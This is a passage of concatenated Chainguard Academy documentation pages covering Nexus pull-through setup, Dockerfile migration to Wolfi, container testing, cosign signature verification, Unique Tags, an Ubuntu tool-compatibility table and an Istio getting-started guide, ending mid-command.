tokens that can be used to pull containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Nexus. Follow the instructions in the link above to create a pull token and take note of the values for username and password as you’ll need this to configure a repository for pulling through Production container images. You can edit the existing repository and all your users will have access to the private images. Alternatively, you could create a new chainguard-private repository exactly as before but with restricted access, though restricting access to repositories in Nexus is beyond the scope of this guide. At the bottom of the configuration screen there will be an HTTP section. Check the Authentication box and use the “Username” Authentication type. Enter the username and password from the pull token in the respective fields. Click the Save button to apply the changes. Testing pull through of a Production container image: If your setup requires authentication, log in with a valid Nexus username and password: docker login -u<user> <Nexus URL> After running this command, you’ll be prompted to enter a password. After running the docker login command, you will be able to pull a Production containers through Nexus. If your organization has access to it, the following example will pull the chainguard-base cotnainer image: docker pull <Nexus URL>/<company domain>/chainguard-base Be sure the docker pull command you run includes the name of your organization’s registry. Debugging pull through from Chainguard’s registry to Nexus If you run into issues when trying to pull Containers from Chainguard’s Registry to Nexus, please ensure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Nexus repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the Nexus pull token credentials) and try pulling a container image from cgr.dev/chainguard/<image name> or cgr.dev/<example.com>/<image name>, using your own organization’s registry name in place of <example.com>. It could be that your Nexus repository was misconfigured. In this case, create and configure a new Nexus repository to test with. Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Sonatype Nexus, we encourage you to refer to the official Nexus documentation. --- ### Migrating Dockerfiles to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migrating-to-chainguard-images/ Last Modified: March 25, 2024 Tags: Chainguard Containers, Product Based on the Wolfi Linux undistro, Chainguard Containers have special features designed for increased security and provenance attestation. Depending on your current base image and custom commands, you may need to make some adjustments when migrating your current Dockerfile workloads to use Chainguard Containers. A general migration process would involve the following steps: Identify the base image you need. Check out the Chainguard Containers Directory to identify the image that is the closest match to what you currently use. You may also use wolfi-base as a flexible starting point for your experimentation. Try the -dev variant of the image first. Chainguard Containers typically have a distroless variant, which is very minimal and doesn’t include apk, and a dev variant that contains tooling necessary to build applications and install new packages. Start with the dev variant or the wolfi-base image to have more room for customization. Identify packages you need to install. Depending on your current base image, you may need to include additional packages to meet dependencies. Refer to the Searching for Packages section for more details on how to find packages. Migrate to a distroless image. Evaluate the option of using a Docker multi-stage build to create a final distroless image containing only what you need. Check the Getting Started with Distroless images for more details of how to work with distroless images. Although not required, this process should give you a smaller image with additional safeguards. There are some differences in Wolfi’s busybox and coreutils packages when compared to their counterparts in distros such as Debian or even Alpine. Some binaries and scripts are not included by default, which contributes to a smaller package size. This was done in order to keep images to a minimum, but be aware that some commands might still be available through separate packages. The next sections of this page contain distro-specific information that should help you streamline the migration process from your current base images to Chainguard images. Migrating from Debian and Ubuntu Dockerfiles Chainguard Containers use the apk package format, which differs from the Debian-based apt in several ways. Some of these features contribute in making packages smaller and more accountable, resulting in smaller images with traceable provenance information based on cryptographic signatures. The page Why apk from the official Wolfi documentation explains in more detail why we use apk. If you are coming from a Debian-based Dockerfile, you’ll need to adapt some of your commands to be compatible with the apk ecosystem: Command Description Debian-based Dockerfile Wolfi-based Equivalent Install a package apt install apk add Remove a package apt remove apk del Update package manager cache apt update apk update Our Debian Compatibility page has a table listing common tools and their corresponding package(s) in both Wolfi and Debian distributions. For Ubuntu-based Dockerfiles, check our Ubuntu Compatibility page. Migrating from Red Hat UBI Dockerfiles If you are coming from a Red Hat UBI (Universal Base Image) Dockerfile, you’ll also need to adapt some of your commands to be compatible with the apk ecosystem. Wolfi uses BusyBox utilities, which offer a smaller footprint compared to GNU coreutils in Red Hat images. Our Red Hat Compatibility page has a table listing common tools and their corresponding package(s) in both Wolfi and Red Hat distributions. If you are coming from a Red Hat UBI based Dockerfile, you’ll need to adapt some of your commands to be compatible with the apk ecosystem: Command Description Red Hat UBI Dockerfile Wolfi-based Equivalent Install a package yum install apk add Remove a package yum remove apk del Update package manager cache yum makecache apk update Migrating from Alpine Dockerfiles If your Dockerfile is based on Alpine, the process for migrating to Chainguard Containers should be more straightforward, since you’re already using apk commands. Wolfi packages typically match what is available in Alpine, with some exceptions. For instance, the Wolfi busybox package is slimmer and doesn’t include all tools available in Alpine’s busybox. Check the Alpine Compatibility page for a list of common tools and their corresponding packages in Wolfi and Alpine. Be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alipne binaries into a Wolfi-based container image. Searching for Packages Packages from Debian and other base distributions might have a different name in Wolfi. To search for packages, log into an ephemeral container based on cgr.dev/chainguard/wolfi-base: docker run -it --rm --entrypoint /bin/sh cgr.dev/chainguard/wolfi-base Then, run apk update to update the local apk cache with latest Wolfi packages: apk update You’ll get output similar to this: fetch https://packages.wolfi.dev/os/x86_64/APKINDEX.tar.gz [https://packages.wolfi.dev/os] OK: 46985 distinct packages available Now you can use apk search to look for packages. The following example searches for PHP 8.2 XML extensions: apk search php*8.2*xml* You should get output similar to this: php-8.2-simplexml-8.2.17-r0 php-8.2-simplexml-config-8.2.17-r0 php-8.2-xml-8.2.17-r0 php-8.2-xml-config-8.2.17-r0 php-8.2-xmlreader-8.2.17-r0 php-8.2-xmlreader-config-8.2.17-r0 php-8.2-xmlwriter-8.2.17-r0 php-8.2-xmlwriter-config-8.2.17-r0 php-simplexml-8.2.11-r1 php-xml-8.2.11-r1 php-xmlreader-8.2.11-r1 php-xmlwriter-8.2.11-r1 Searching which package has a command To search in which package you can find a command, you can use the syntax apk search cmd:command-name. For instance, if you want to discover which package has the command useradd, you can use: apk search cmd:useradd You’ll get output indicating that the shadow package has the command you are looking for. shadow-4.15.1-r0 Searching for package dependencies To check for package dependencies, you can use the syntax apk search -R info package-name. For example, to search which packages are listed as dependencies for the shadow package that we’ve seen in the previous section, you can run: apk -R info shadow And this will give you a list of dependencies for each version of the shadow package currently available: ... shadow-4.15.1-r0 depends on: so:ld-linux-x86-64.so.2 so:libbsd.so.0 so:libc.so.6 so:libcrypt.so.1 so:libpam.so.0 so:libpam_misc.so.0 Searching for packages that include a shared object To search which packages include a shared object, you can use the syntax apk search so:shared-library. As an example, if you want to check which packages include the libxml2 shared library, you can run something like: apk search so:libxml2.so* And this should give you output indicating that this shared object is included within the libxml2-2.12.6-r0 package. For detailed information about apk options and flags when searching for packages, check the official documentation. Resources to Learn More Our Getting Started Guides have detailed examples for different language ecosystems and stacks. Make sure to also check image-specific information in our Chainguard Containers Directory. If you can’t find an image that is a good match for your use case, or if your build has dependencies that cannot be met with the regular catalog, get in touch with us for alternative options. --- ### How Chainguard Containers are Tested URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-testing/ Last Modified: April 7, 2025 Tags: Overview, Chainguard Containers, Product Chainguard Containers are minimal, distroless container images that you can use to build and run secure applications. Given the importance of secure, highly performant images, Chainguard performs testing to ensure our container images match the functionality of upstream and other external counterparts. This article provides a high-level overview of Chainguard’s approach to testing when building new container images to ensure their security and consistency with comparable container images. Build requirements for new container images Chainguard has a set of requirements in place that new container images must meet in order to be included in our Containers Directory. These requirements fall into two categories: Container image standards Application testing Container image standards When building a new container image, Chainguard will take steps to ensure it meets the following standards: Requirement Explanation Size Any new Chainguard Containers should be smaller than their external counterparts, though exceptions may occur. CVEs When scanned with a CVE scanning tool like Grype, new container images should return zero CVEs. If a container image does return CVEs in its scan results it should include an explanation, though some reported CVEs may be false positives. Refer to our Security Advisories for more information. Kubernetes accessibility Containers used for Kubernetes-based deployments must be able to run inside of a Kubernetes cluster. Architecture Chainguard Containers must be built for both the x86_64 and aarch64 architectures. Application testing Chainguard performs the following checks on new container images to ensure that the applications contained within them meet the needs of most use cases: Requirement Explanation Functionality The application is tested to comply with is upstream counterpart’s core feature set. Builder Containers Chainguard’s builder containers can in fact build new, functional container images. Automated tests In addition to the container image build requirements outlined previously, Chainguard also performs a number of automatic checks for new container images as part of our CI/CD process. Depending on the container image, Chainguard peforms various representative tests, such as functional and integration tests. For example, for applications primarily deployed with a Helm chart, the container image is deployed to an ephemeral Kubernetes cluster using the accepted Helm chart, which is validated in various ways. When applicable, Chainguard will develop functional tests for container images. These tests vary by application, but can generally be thought of as integration tests that run after a container image is built but before it gets tagged. Our goal for these tests is that they fully evaluate the container image’s deployment in a representative environment; for example, container images running Kubernetes applications are tested in a Kubernetes cluster and builder or toolchain applications are tested with a docker run command or part of a docker build process. This means that our container images work with the existing upstream deployment methods, such as Helm charts or Kustomize manifests, helping us to ensure that a container image is as close to a drop-in replacement as possible. Additionally, Chainguard performs automated tests on every package included in our container images. These tests run on every new build within an ephemeral container environment before the build is published. This allows us to validate the representative functionality of each package. Learn more Chainguard’s rigorous container image testing standards and frequent updates ensure that they will work as expected with few (and often zero) vulnerabilities. If you’re having trouble working with a specific Chainguard Container, we encourage you to check out its relevant Overview page in our Chainguard Containers Directory. For general help with using Chainguard Containers, you can refer to our Debugging Distroless Container Images guide or our Chainguard Containers FAQs. For help with specific issues or questions not covered in these resources, please contact our support team. --- ### Verifying Chainguard Containers and Metadata Signatures with Cosign URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/verifying-chainguard-images-and-metadata-signatures-with-cosign/ Last Modified: June 5, 2025 Tags: Chainguard Containers, Product All Chainguard Containers contain verifiable signatures and attestations such as SBOMs (software bills of materials) which enable users to confirm the origin of each image built and have a detailed list of everything that is packed within. This guide outlines how you can use Cosign to download and verify container image signatures and attestations. Prerequisites The following examples require Cosign and jq to be installed on your machine in order to download and verify image attestations. Registry and Tags for Chainguard Containers Attestations are provided per image build, so you’ll need to specify the correct tag and registry when pulling attestations from an image with cosign. This guide works with Chainguard’s public and private registries: cgr.dev/chainguard: The public registry contains Chainguard’s Starter container images, which typically comprise the :latest versions of an image. cgr.dev/YOUR-ORGANIZATION: A private/dedicated registry contains your organization’s Production container images, which include all versioned tags of an image and special images that are not available in the public registry (including FIPS images and other custom builds). The commands listed on this page will default to the :latest tag, but you can specify a different tag to fetch attestations for. Chainguard’s Signing Identities Chainguard uses an identity associated with its official GitHub account to sign images in the public registry that contains the free tier of Starter images. For private images, Chainguard signs all images in your private registry with one of two different identities in your organization: The catalog_syncer identity is used to sign images that have been imported directly from the Chainguard Containers catalog. The apko_builder identity is used to sign any images that have been customized for your organization, such as those built with Custom Assembly. These identities are created and added to every verified Chainguard organization automatically. To follow along with the Private Registry examples in this guide, you will need the unique identifier paths (UIDPs) of these Chainguard identities. To this end, create a few environment variables, the first of which should point to the name of your Chainguard organization: PARENT=your-organization Next, create two more variables to hold the UIDPs of your organization’s catalog_syncer and apko_builder identities, respectively: CATALOG_SYNCER=$(chainctl iam account-associations describe $PARENT -o json | jq -r '.[].chainguard.service_bindings.CATALOG_SYNCER') APKO_BUILDER=$(chainctl iam account-associations describe $PARENT -o json | jq -r '.[].chainguard.service_bindings.APKO_BUILDER') The Private Registry examples in this guide will include these environment variables, allowing you to verify that they were used to sign the given image. Be aware that you can also find these values in the Chainguard Console. After logging in, click on Settings, and then Users. From there, scroll or search for either catalog_syncer or apko_builder and click on its row to find the identity’s UIDP: Verifying Container Image Signatures Chainguard Containers are signed using Sigstore and you can check the included signatures using cosign. The cosign verify command will pull detailed information about all signatures found for the provided image. Public Registry IMAGE=go cosign verify \ --certificate-oidc-issuer=https://token.actions.githubusercontent.com \ --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/${IMAGE} | jq Private/Dedicated Registry IMAGE=go cosign verify \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE} | jq Be aware that you will need to change the IMAGE environment variable to reflect a container image your organization is entitled to. Note: The environment variables used in this command (other than ${IMAGE}) were created in the previous section. By default, this command will fetch signatures for the :latest tag. If you’d like, you can specify the tag you want to fetch signatures for: IMAGE=go TAG=1.23.8 cosign verify \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE}:${TAG} | jq Downloading Container Attestations Attestations are signed metadata about the artifact, which can include SBOMs, vulnerability scans, or other custom predicates. The attestations for a container image can be obtained and verified using Cosign. These are a few of the existing types: Attestation Type Description https://slsa.dev/provenance/v1 The SLSA 1.0 provenance attestation contains information about the image build environment. https://apko.dev/image-configuration Contains the configuration used by that particular image build, including direct dependencies, user accounts, and entry point. https://spdx.dev/Document Contains the image SBOM in SPDX format. To download an attestation, use the cosign download attestation command and provide both the predicate-type and the build platform. By default, this command will fetch the SBOM assigned to the latest tag. You can also specify the tag you want to fetch the attestation from. To download a different attestation, replace the --predicate-type parameter value with the desired attestation URL identifier. To illustrate, the following examples will obtain the SBOM for the requested image for the linux/amd64 platform. Public Registry IMAGE=go cosign download attestation \ --predicate-type=https://spdx.dev/Document \ --platform=linux/amd64 \ cgr.dev/chainguard/${IMAGE} | jq -r .payload | base64 -d | jq .predicate Private/Dedicated Registry IMAGE=go cosign download attestation \ --predicate-type=https://spdx.dev/Document \ --platform=linux/amd64 \ cgr.dev/${PARENT}/${IMAGE} | jq -r .payload | base64 -d | jq .predicate Verifying Image Attestations You can use the cosign verify-attestation command to check the signatures of the desired container image attestations: Public Registry IMAGE=go cosign verify-attestation \ --type https://spdx.dev/Document \ --certificate-oidc-issuer=https://token.actions.githubusercontent.com \ --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/${IMAGE} | jq This will pull in the signature for the attestation specified by the --type parameter, which in this case is the SPDX attestation for SBOMs. You will receive get output that verifies the SBOM attestation signature in Cosign’s transparency log: Verification for cgr.dev/chainguard/go -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates Certificate subject: https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main Certificate issuer URL: https://token.actions.githubusercontent.com GitHub Workflow Trigger: schedule GitHub Workflow SHA: da283c26829d46c2d2883de5ff98bee672428696 GitHub Workflow Name: .github/workflows/release.yaml GitHub Workflow Trigger chainguard-images/images GitHub Workflow Ref: refs/heads/main ... Private/Dedicated Registry IMAGE=go cosign verify-attestation \ --type https://spdx.dev/Document \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE} | jq Note About the Examples in this Guide The examples in this guide invariably pass command output through jq, a JSON processor. This is helpful, as it makes the output more easily readable. However, if you’re running these commands in a script, this can cause problems if validation fails. For example, if Cosign returns an error but it is passed into jq, then jq will overwrite the exit codes from Cosign, causing them to be silently ignored. To avoid this problem, you could include either or both of the following set options in your script: set -e ensures that your script exits with an error if any of the commands in your script exit with an error. set -o pipefail ensures that status codes from Cosign aren’t masked when piped to jq. Learn more To get up to speed with Sigstore, you can review the Sigstore section of Chainguard Academy, visit the upstream Sigstore Docs site, and check out the Sigstore organization on GitHub. You can learn more about verifying software artifacts with Cosign by reading How to Verify File Signatures with Cosign. Navigate to our container images landing page or Getting Started Guides to understand more about Chainguard Containers and how they offer low-to-zero CVEs. --- ### Unique Tags for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/unique-tags/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product Some organizations use image tags as an indication that there is a new container image available in a registry. Oftentimes, these organizations’ internal automation and policies expect each new build to have its own distinct tag. To help with cases like this, Chainguard offers Unique Tags for private registries. Unique Tags are ideal for organizations that require a strict tag per release or update of their images. They benefit teams looking for precise tracking and management of container images. Unique Tags are an opt-in feature that is only available for private registries. If your organization is interested in using Unique Tags, please contact support and we will enable this feature for you. This guide provides an overview of what these Unique Tags are, the kinds of problems they aim to solve, and how you can access them in the Chainguard Console. Chainguard’s Unique Tags Unique Tags are only available for private registries, as Chainguard’s public registry only has the :latest or, in some cases, the :latest-dev tags available. Unique Tags feature an opt-in feature, which allows customers the flexibility to enable it based on their specific operational and security requirements. Chainguard’s Unique Tags end in a timestamp, such as 20240229, which indicates the date when the Container was built. Because Chainguard Containers are rebuilt whenever there is a change to an included package, the timestamp ensures that the specific tag will always represent that specific container image build and not another. One benefit of using this timestamp scheme with Unique Tags is that it can help users to quickly identify when a given version of an container image was built. It also helps to make them human-readable, as opposed to the long, unpronounceable strings that make up container image digests. Unique Tags also allow for individual image repositories within a registry to be included or excluded as needed. For example, if you have an application that requires a specific tagging scheme to be compatible with an existing Helm chart, you can enable Unique Tags for your registry, but exclude that specific repository so that its container images only receive the standard tags. This granular level of control ensures that organizations can implement unique tagging in a way that best suits their organization’s specific needs. It offers a tailored approach to image management, allowing for precise and efficient tracking of image versions and builds across different environments. Additionally, the Unique Tags feature is integrated with Chainguard’s Tag History API and event notifications. These integrations allow you to track changes over time. How do I find Unique Tags? After signing into the Chainguard Console, click on Organization images in the left-hand navigation. This will take you to your organization’s container images directory where you’ll be presented with a list of all the Chainguard Production container images you can access. To the right of the search box and Category drop-down menu there’s a filter button labeled Visible tags. Click on that button, and you’ll see a drop-down menu with two options: Epoch tags and Unique tags. Toggle Unique tags to see the Unique Tags available for your organization’s container images. By toggling this button on, each individual container image’s details page will show the Unique Tags available for it. To illustrate, toggle this button on and then click on any paid Production container image listed in your organization’s directory. The “Version” column will now show the Unique Tags available for that container image. These tags include a timestamp in the format YYYYMMDDHHMM, and may include a prefix to help identify and parse the tag name programmatically. Here there are a number of container image versions with tags similar to :openjdk-17-202412120223. This means that this particular version of the container image was last updated on December 12, 2024, at 2:23 AM. You can use this version’s Pull URL (cgr.dev/$ORGANIZATION/jdk-fips:openjdk-17-202412120223) to download this container image, and you can be confident that this Pull URL will always refer to the same container image. Learn More It should be noted that by their design, container image tags are mutable, meaning that they can change over time. Although Unique Tags are meant to serve as a secure solution for teams whose internal workflows assume tag immutability, we still recommend that users pull container images by their digests whenever possible. Check out the “Pulling by Digest” section of our guide on How to Use Chainguard Containers for more information. You may also find our video on How to Use Container Image Digests to Improve Reproducibility to be useful. Additionally, you may find our three-part blog series on Chainguard’s image tagging philosophy to be of interest. Part 1 Part 2 Part 3 --- ### Ubuntu Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/ubuntu-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Ubuntu base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Ubuntu distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Ubuntu. You can use the apk search command in Wolfi, and the apt-cache search command in Ubuntu to find out which package includes a tool. Utility Wolfi busybox Ubuntu busybox Wolfi coreutils Ubuntu coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ ✅ ar ✅ arch ✅ ✅ ✅ arp ✅ arping ✅ ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ bc ✅ ✅ beep ✅ bin ✅ blkdiscard ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ coreutils ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ cryptpw ✅ csplit ✅ ✅ cttyhack ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ deluser ✅ depmod ✅ devmem ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ dumpleases ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ env ✅ ✅ ✅ ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ freeramdisk ✅ fsfreeze ✅ fstrim ✅ fsync ✅ ftpget ✅ ftpput ✅ fuser ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ httpd ✅ hwclock ✅ i2cdetect ✅ i2cdump ✅ i2cget ✅ i2cset ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifup ✅ init ✅ inotifyd ✅ insmod ✅ install ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ip ✅ ipcalc ✅ ipcrm ✅ ipcs ✅ ipneigh ✅ join ✅ ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ linuxrc ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ lsmod ✅ lsof ✅ lsscsi ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ md5sum ✅ ✅ ✅ ✅ md5sum.textutils ✅ mdev ✅ microcom ✅ ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mke2fs ✅ mkfifo ✅ ✅ ✅ ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ mpstat ✅ mt ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ nuke ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ paste ✅ ✅ ✅ ✅ patch ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ ✅ pkill ✅ pmap ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ rdate ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ remove-shell ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ resume ✅ rev ✅ ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ route ✅ rpm ✅ rpm2cpio ✅ run-init ✅ run-parts ✅ ✅ runcon ✅ ✅ sbin ✅ sed ✅ ✅ seq ✅ ✅ ✅ ✅ setkeycodes ✅ setpriv ✅ ✅ setserial ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ sha512sum ✅ ✅ ✅ ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ssl_client ✅ start-stop-daemon ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ svc ✅ svok ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ taskset ✅ tee ✅ ✅ ✅ ✅ telnet ✅ test ✅ ✅ ✅ ✅ tftp ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ tunctl ✅ ubirename ✅ udhcpc ✅ udhcpd ✅ uevent ✅ umount ✅ uname ✅ ✅ ✅ ✅ uncompress ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ usr ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock ✅ w ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ xargs ✅ ✅ xxd ✅ ✅ xz ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ --- ### Getting Started with the Chainguard Istio Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/istio/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product Istio extends Kubernetes to establish a programmable, application-aware network using the powerful Envoy service proxy. Working with both Kubernetes and traditional workloads, Istio brings standard, universal traffic management, telemetry, and security to complex deployments. Chainguard offers a set of minimal, security-hardened Istio container images, built on top the Wolfi OS. We will demonstrate how to get started with the Chainguard Istio container images on an example kind cluster. To get started, you’ll need Docker, kind, kubectl, and istioctl installed. If you are missing any, you can follow the relevant link to get started. Docker kind kubectl istioctl Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Start up a kind cluster First, we’ll start up a kind cluster to install Istio. kind create cluster This will return output similar to the following: Creating cluster "kind" ... ✓ Ensuring node image (kindest/node:v1.27.3) 🖼 ✓ Preparing nodes 📦 ✓ Writing configuration 📜 ✓ Starting control-plane 🕹️ ✓ Installing CNI 🔌 ✓ Installing StorageClass 💾 Set kubectl context to "kind-kind" You can now use your cluster with: kubectl cluster-info --context kind-kind Thanks for using kind! 😊 Following that, you can install the Istio Chainguard Containers with istioctl. Install Istio using Chainguard Containers We will be using the istioctl command to install Istio. In order to use the Chainguard Containers, we will need to set these following values: hub = cgr.dev/$ORGANIZATION Note: Be aware that you will need to change cgr.dev/$ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. tag = latest values.pilot.image = istio-pilot values.global.proxy.image = istio-proxy values.global.proxy_init.image = istio-proxy We can set these values with the following istioctl command: istioctl install --set tag=latest --set hub=cgr.dev/$ORGANIZATION \ --set values.pilot.image=istio-pilot \ --set values.global.proxy.image=istio-proxy \ --set values.global.proxy_init.image=istio-proxy The Istio Chainguard Container is now running on the kind cluster you created previously. In the next section, you’ll set up an Istio gateway and a VirtualService to test out this container. Stand up a Gateway and a VirtualService To see the Istio installation in action, we will create two Istio resources: An Istio gateway serving the “http://hello.example.com” domain A VirtualService to always reply with “Hello, world!” to requests to the “http://hello.example.com” domain Create a YAML manifest file with the following contents to define the Istio resources: cat > example.yaml <<EOF apiVersion: networking.istio.io/v1alpha3 kind: Gateway metadata: name: sample-gateway spec: servers: - port: number: 80 name: http protocol: HTTP hosts: - "hello.example.com" --- apiVersion: networking.istio.io/v1alpha3 kind: VirtualService metadata: name: sample-virtual-service spec: gateways: - sample-gateway hosts: - "hello.example.com" http: - directResponse: status: 200 body: string: "Hello, world!\n" EOF Apply the YAML file to the cluster: kubectl apply -f example.yaml Now, in one terminal, start a port-forward to the Istio Ingress Gateway: kubectl port-forward svc/istio-ingressgateway -n istio-system 8080:80 In another terminal, send a request to the Istio Ingress Gateway: curl -H 